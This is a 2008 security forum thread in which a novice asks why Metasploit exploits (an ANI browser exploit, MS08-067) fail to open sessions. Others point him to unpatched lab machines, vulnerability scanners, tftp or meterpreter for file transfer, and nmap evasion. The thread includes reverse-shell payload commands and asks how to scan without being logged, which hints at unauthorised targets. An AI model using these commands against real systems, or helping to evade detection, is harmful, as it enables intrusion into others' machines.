- This topic has 21 replies, 7 voices, and was last updated 12 years, 4 months ago by
KrisTeason.
-
AuthorPosts
-
-
November 14, 2008 at 7:15 pm #3010
mr.Z
ParticipantI have some problem with use metasploit
i’m test more exploit but not sucss I’don’t wht problem
look this example
use windows/browser/ani_loadimage_chunksize
set SRVHOST myip
set SRVPORT 8000
set URIPATH nono
set payload windows/shell_reverse_tcp
set LHOST ip victim
>exploit
[*] Started reverse handler[*] Using URL: http://ip:8000/nono%5B*%5D Server started.
after i’m test this on OS xp sp and IE 7 ,IE 6
after tell me [*] Sending HTML page to ip:6668…[*] Sending ANI file to ip:6668…
i’m wating but nothing happen
>> sessions -l
Active sessions===============No active sessions.
what problem >>>???
any idea?
and can any one give me some exploit working on xp sp2 and sp3
-
November 14, 2008 at 7:45 pm #20579
BillV
ParticipantSounds like it’s not vulnerable.
-
November 14, 2008 at 7:58 pm #20580
mr.Z
Participantthanx
but i’m show target
— —-
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vistaand i’m test on 7 pc’s seam problem ;D
-
November 14, 2008 at 9:29 pm #20581
BillV
ParticipantJust because those are listed as targets, doesn’t mean they’re vulnerable… just what the exploit can attack.
-
November 14, 2008 at 10:55 pm #20582
mr.Z
Participantok thanx
but can give me some name exploit working on win xp sp1,sp2,sp3,vista
and I want exploit use without send the url to victim
I’m using MSF under windows xp
-
November 15, 2008 at 4:09 am #20583
BillV
Participant@mr.Z wrote:
I’m using MSF under windows xp
There’s your first problem. Run it under Linux.
I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.
-
November 15, 2008 at 4:26 am #20584
Anonymous
Participantms08-067 exploit
-
November 16, 2008 at 7:37 pm #20585
mr.Z
Participant@BillV wrote:
@mr.Z wrote:
I’m using MSF under windows xp
There’s your first problem. Run it under Linux.
I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.
thanx alot now i’m work in linux and update msf
—-
ChrisGthanx
I’m test this exploit but show me message problem
[*] Started bind handler
[-] Exploit failed: The connection timed out (ip-vicitm:4444).
[*] Exploit completed, but no session was created.why this not work what problem
but no session was created????
plz tell me
-
November 17, 2008 at 4:47 am #20586
apollo
ParticipantYou probably aren’t vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
-
November 17, 2008 at 3:25 pm #20587
mr.Z
Participant@apollo wrote:
You probably aren’t vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
You are correct but I want test on full patch windows xp
and I’m try much and i’m show if port 445 open then you can use ms08-067 expoit and if the windows xp full patchany more Idea?
-
November 17, 2008 at 6:37 pm #20588
BillV
Participant@mr.Z wrote:
any more Idea?
Yes, I think you need to do more research and studying regarding exploits and how metasploit works.
I suggest you start here.
BillV
-
November 17, 2008 at 11:06 pm #20589
apollo
ParticipantI’ll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus. There is another option for you to google which is db_autopwn. If you search for that, and you use backtrack3 things will get easier for you. If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate. If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.
-
November 18, 2008 at 2:05 am #20590
geekyone
Participant@mr.Z wrote:
You are correct but I want test on full patch windows xp
and I’m try much and i’m show if port 445 open then you can use ms08-067 expoit and if the windows xp full patchany more Idea?
Your biggest problem is trying to exploit a fully patched windows xp box with metasploit. If you want to learn more about metasploit and practice pen testing techniques don’t attack a fully patched box in your lab.
Metasploit doesn’t have any zero day vulnerabilities included in it (currently) so you are never going to be able to successfully exploit a fully patched box with metasploit right now. Now if you really want to exploit a fully patched xp box you should take Billv’s suggestion to heart because that is going to involve getting into zero day vulnerability research. Which requires an in depth understanding of how exploits work. If you want to get into that I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition.
-
November 22, 2008 at 7:37 pm #20591
mr.Z
ParticipantTHANK YOU ALL
now i’m install windows xp witout servies pack
and exploit this windows
i’m use paylod
>”windows/shell_reverse_tcp”
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:WINDOWSsystem32>
but I cant upload some file i’m using this msf under linux
test some command like this
>copy /root/xx.txt c:but not succss the error msg
>copy /root/xx.txt c:
The syntax of the command is incorrect -
November 22, 2008 at 7:47 pm #20592
KrisTeason
ParticipantIf your getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP Server on your Linux box, when requesting the files using tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp Payload and use the upload from there, it’s quicker. The meterpreter also has alot of other useful options as well.
-
November 23, 2008 at 11:23 am #20593
mr.Z
Participantnow ok i’m using tftp
now i have laptop and scan using nmap
nmap -PN -p 445,21,135,139 192.168.1.1
say
Interesting ports on 192.168.1.1:
PORT STATE SERVICE
445/tcp filtered microsoft-ds
135/tcp filtered
…..
what can I do for this problem I want exploit this my os win -
November 23, 2008 at 2:01 pm #20594
Anonymous
Participantyou’ll have to do a udp scan to see your open udp port 🙂
-
November 27, 2008 at 6:30 am #20595
mr.Z
ParticipantOK THANK YOU FOR MORE INFO
BUT I WANNA ASK YOU ABOUT TOOL NMAP IF I USING SCAN? IS SAFE I MEAN IF I SCAN SOME IP REG THIS ON SERVER REGISTER MY IP ON LOG SERVER OR WHAT ?
IF YOU HAVE PAR MITER COMMAND FOR NMAP DON’T REGISTER ON LOG GIVE ME PLZ
like this
nmap -sS hostname
if i scan this SAFE or what?
-
November 27, 2008 at 9:07 am #20596
Anonymous
ParticipantUsing nmap is not safe, most scan will send packets to the target IP address. What the remote system does with these packets is up to them but logging, port scan detection and other techniques may be used to identify the scan.
Jimbob
-
November 27, 2008 at 9:50 am #20597
mr.Z
Participantbut somebody say if using this command is safe?
nmap -sS -O -v hostname
ok can tell me what solution
-
November 27, 2008 at 10:41 am #20598
RoleReversal
Participant@mr.Z wrote:
but somebody say if using this command is safe?
nmap -sS -O -v hostname
ok can tell me what solution
I’m a bit confused, what do you mean by ‘safe’?
- liable to crash the target?
- liable to get you arrested?
- liable to start world war 3?
- …
All (well ok most) depend on your hardware, target and situation.
-
November 27, 2008 at 5:09 pm #20599
KrisTeason
ParticipantI think he’s trying to figure out what scan would be the noisiest and what scan would be safer to run without being logged. You should look into:
http://www.nmap-tutorial.com/
And download the Nmap Tutorial, PDF, I just gave it a quick read through it tells what parameters you could set in nmap to make it less detectable on hosts.
-
-
AuthorPosts
- You must be logged in to reply to this topic.